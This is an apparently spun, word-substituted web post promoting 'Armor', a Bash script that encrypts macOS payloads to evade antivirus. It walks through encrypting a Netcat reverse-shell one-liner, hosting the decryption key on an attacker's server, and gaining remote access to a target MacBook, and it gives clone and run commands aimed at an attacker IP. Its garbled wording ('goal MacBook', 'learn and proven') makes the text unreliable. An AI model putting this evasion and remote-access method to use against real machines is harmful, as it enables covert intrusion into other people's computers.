Armor is an easy Bash script designed to create encrypted macOS payloads able to evading antivirus
scanners. Below is an instance gif of Armor getting used with a easy Netcat payload.
A Netcat listener
is began on port 4444. The “payload.txt” file is learn and proven to include a easy Bash one-liner that, when executed, will create a TCP connection between the goal MacBook on the attacker’s Netcat listener. Armor is used to encrypt the bash one-liner. Ncat is used to host the decryption key on the attacker’s server. When the stager is executed within the goal MacBook (not proven within the gif), the bash one-liner is decrypted and executed with out writing any knowledge to the harddrive. Ncat instantly terminates the listener after the important thing has been used. When the Netcat connection is established, the attacker has remote access
to the goal MacBook.
Admittedly, encrypting most macOS-particular payloads is overkill. This particular bash one-liner is able to bypassing antivirus with out the assistance of Armor. But that is simply an exmaple. The similar diploma of obfuscation
will be utilized to stylish Python, Ruby, and Shell scripts
designed to execute quite a lot of superior assaults.
Armor depends on LibreSSL to encrypt the enter file and create the SSL certificates. If LibreSSL is not present in your system, Armor will try to put in it. The operate for this may be discovered within the
armor.sh file. Ncat can be a dependency and will be put in in Kali utilizing
$ apt-get replace && apt-get set up nmap.
Armor will be cloned and executed utilizing the beneath instructions.
git clone https://github.com/tokyoneon/Armor
chmod +x armor.sh
./armor.sh /path/to/payload.txt 220.127.116.11 443
The 18.104.22.168 tackle is the attacker’s IP tackle the place the decryption key might be hosted. This generally is a native IP tackle or VPS. The port quantity (443), is bigoted and will be modified as wanted.
Questions and issues: